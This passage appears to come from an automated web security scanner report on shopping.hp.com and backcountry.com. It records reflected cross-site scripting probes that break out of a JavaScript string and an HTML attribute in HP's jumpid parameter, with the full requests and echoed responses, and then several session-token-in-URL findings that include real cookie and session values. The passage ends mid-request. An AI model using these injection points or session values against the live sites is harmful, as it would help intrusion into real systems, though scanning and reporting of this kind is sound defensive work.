<a href="/webapp/shopping/store_access.do?clear_recommends=1&storeName=storefronts&template_type=landing&landing=desktops1646f"a="b"7e9af0dbff6&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921" class="udrlinesmall">
...[SNIP]...

1.57. http://www.shopping.hp.com/webapp/shopping/store_access.do [jumpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The value of the jumpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a65bb'%3bcbc9240e496 was submitted in the jumpid parameter. This input was echoed as a65bb';cbc9240e496 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921a65bb'%3bcbc9240e496 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; HP_EBUS_HP_CLICKS=4x12x2345; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:12 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkuiN6f0QhxMiDrvVfbcQyX0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:01:13 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:01:13 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 241415


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<script language="JavaScript">

checkTab();
var s_prop4 = 'in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921a65bb';cbc9240e496|HP Pavilion p7xt series';
var s_prop21 = 'null|desktops|p7xt_series|2|';

/* Script added to introduce New Omniture Variables */

// PVCS Fix #23259 - omni_v1 was replaced by omni_serie
...[SNIP]...

1.58. http://www.shopping.hp.com/webapp/shopping/store_access.do [jumpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The value of the jumpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0f5c"%20a%3db%203b7c529c414 was submitted in the jumpid parameter. This input was echoed as a0f5c" a=b 3b7c529c414 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921a0f5c"%20a%3db%203b7c529c414 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; HP_EBUS_HP_CLICKS=4x12x2345; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:00 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksg9%2Be2AN8MS3ivVbadgSe0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:01:02 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:01:02 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 241546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<a href="/webapp/shopping/store_access.do?clear_recommends=1&storeName=computer_store&catLevel=3&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921a0f5c" a=b 3b7c529c414&template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921a0f5c"%20a%3db%203b7c529c414" class="udr
...[SNIP]...

2. Session token in URL  previous  next
There are 9 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


2.1. http://sales.liveperson.net/hc/9551721/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/9551721/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/9551721/?&visitor=5110247826455&msessionkey=8682657700751775312&site=9551721&cmd=mTagUrl&lpCallId=978835962945-672407449222&protV=20&lpjson=1&SV%21impression-query-name=chat-bcs&SV%21impression-query-room=chat-bcs&id=9607976011&info=button-impression%3Achat-bcs%28Gift%20Certificate%20from%20Backcountry.com%29&waitForVisitor=true&d=1316711597230&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.backcountry.com/store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=BCS0021-BCSGC125-ONSI&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=55&y=10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:11:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 22 Sep 2011 12:12:00 GMT
Set-Cookie: HumanClickSiteContainerID_9551721=STANDALONE; path=/hc/9551721
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"978835962945-672407449222","lpCallConfirm":"","lpData":[{"result":40}]}});

2.2. http://www.backcountry.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-New: 1
X-Session-Init: 1
X-Session-Path: No session id
X-Session-Checked: 1
Moovweb-Pagetype: HOME
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: grays
Content-Length: 91160
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:00 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.3. http://www.backcountry.com/backcountry-gift-certificate-bcs0021  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /backcountry-gift-certificate-bcs0021

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /backcountry-gift-certificate-bcs0021 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/womens-capri-pants
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA; rdv_test_group=1; __utmx=248652180.; __utmxx=248652180.; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Moovweb-Pagetype: PRODUCT
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 268352
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.4. http://www.backcountry.com/mens-clothing  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /mens-clothing

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /mens-clothing HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/store/user.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; shipping_selection=FREE; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; siec=false; affiliate_reference_id=R999; tr_template=; promo_nav=; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%2C%5B%27Direct%2520Load%27%2C%271316711656080%27%5D%5D; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713456784; c49=Customer%20Login; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DCustomer%252520Login%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/mens-clothing%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Moovweb-Pagetype: CATEGORY
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 104410
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:34 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:33 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:33 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:34 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.5. http://www.backcountry.com/prana-bliss-capri-pant-womens  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /prana-bliss-capri-pant-womens

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /prana-bliss-capri-pant-womens HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/womens-capri-pants
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA; rdv_test_group=1; __utmx=248652180.; __utmxx=248652180.; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Moovweb-Pagetype: PRODUCT
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: lincoln
Content-Length: 138134
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:23 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.6. http://www.backcountry.com/store/cart/add.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/cart/add.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=BCS0021-BCSGC125-ONSI&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=55&y=10 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
